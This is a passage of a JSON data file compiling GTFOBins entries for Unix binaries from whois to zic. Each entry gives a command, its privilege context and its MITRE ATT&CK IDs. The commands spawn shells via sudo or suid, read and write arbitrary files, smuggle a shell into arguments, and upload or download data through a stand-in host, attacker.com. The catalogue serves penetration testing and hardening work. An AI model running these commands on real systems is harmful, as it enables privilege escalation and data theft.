Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:download:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:upload:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:upload:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:upload:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:wireshark:file-write:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wireshark:file-write:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wireshark:inherit:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wireshark:inherit:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wish:inherit:0:sudo","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wish/"]},{"id":"gtfo:wish:inherit:0:suid","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wish/"]},{"id":"gtfo:wish:inherit:0:unprivileged","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wish/"]},{"id":"gtfo:xargs:file-read:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:file-read:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:file-read:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:1:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:1:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:1:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:2:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:2:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:2:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xdg-user-dir:shell:0:sudo","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"]},{"id":"gtfo:xdg-user-dir:shell:0:unprivileged","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"]},{"id":"gtfo:xdotool:shell:0:sudo","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdotool/"]},{"id":"gtfo:xdotool:shell:0:suid","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xdotool/"]},{"id":"gtfo:xdotool:shell:0:unprivileged","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdotool/"]},{"id":"gtfo:xmodmap:file-read:0:sudo","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmodmap/"]},{"id":"gtfo:xmodmap:file-read:0:suid","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmodmap/"]},{"id":"gtfo:xmodmap:file-read:0:unprivileged","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmodmap/"]},{"id":"gtfo:xmore:file-read:0:sudo","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmore/"]},{"id":"gtfo:xmore:file-read:0:suid","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmore/"]},{"id":"gtfo:xmore:file-read:0:unprivileged","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmore/"]},{"id":"gtfo:xpad:file-read:0:sudo","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xpad/"]},{"id":"gtfo:xpad:file-read:0:suid","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xpad/"]},{"id":"gtfo:xpad:file-read:0:unprivileged","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xpad/"]},{"id":"gtfo:xxd:file-read:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-read:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-read:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-write:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-write:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-write:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xz:file-read:0:sudo","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xz/"]},{"id":"gtfo:xz:file-read:0:suid","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xz/"]},{"id":"gtfo:xz:file-read:0:unprivileged","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xz/"]},{"id":"gtfo:yarn:shell:0:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:0:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:1:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:1:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:2:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:2:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yash:shell:0:sudo","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yash/"]},{"id":"gtfo:yash:shell:0:suid","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/yash/"]},{"id":"gtfo:yash:shell:0:unprivileged","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yash/"]},{"id":"gtfo:yelp:file-read:0:sudo","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yelp/"]},{"id":"gtfo:yelp:file-read:0:unprivileged","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yelp/"]},{"id":"gtfo:yt-dlp:shell:0:sudo","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"]},{"id":"gtfo:yt-dlp:shell:0:unprivileged","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"]},{"id":"gtfo:yum:command:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"yum localinstall -y x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install .x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"]},{"id":"gtfo:yum:download:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"yum install http://attacker.com/path/to/input-file.rpm","description":"The file on the remote host must have the `.rpm` extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp/yum-root-xxxxxx/`.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"]},{"id":"gtfo:yum:inherit:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"cat >/path/to/temp-dir/x<<EOF\n[main]\nplugins=1\npluginpath=/path/to/temp-dir/\npluginconfpath=/path/to/temp-dir/\nEOF\n\ncat >/path/to/temp-dir/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\ncat >/path/to/temp-dir/y.py<<EOF\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n ...\nEOF\n\nyum -c /path/to/temp-dir/x --enableplugin=y","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"]},{"id":"gtfo:zathura:shell:0:sudo","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zathura/"]},{"id":"gtfo:zathura:shell:0:unprivileged","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zathura/"]},{"id":"gtfo:zcat:file-read:0:sudo","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zcat/"]},{"id":"gtfo:zcat:file-read:0:unprivileged","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zcat/"]},{"id":"gtfo:zgrep:file-read:0:sudo","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zgrep/"]},{"id":"gtfo:zgrep:file-read:0:unprivileged","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zgrep/"]},{"id":"gtfo:zic:command:0:sudo","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zic/"]},{"id":"gtfo:zic:command:0:suid","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is 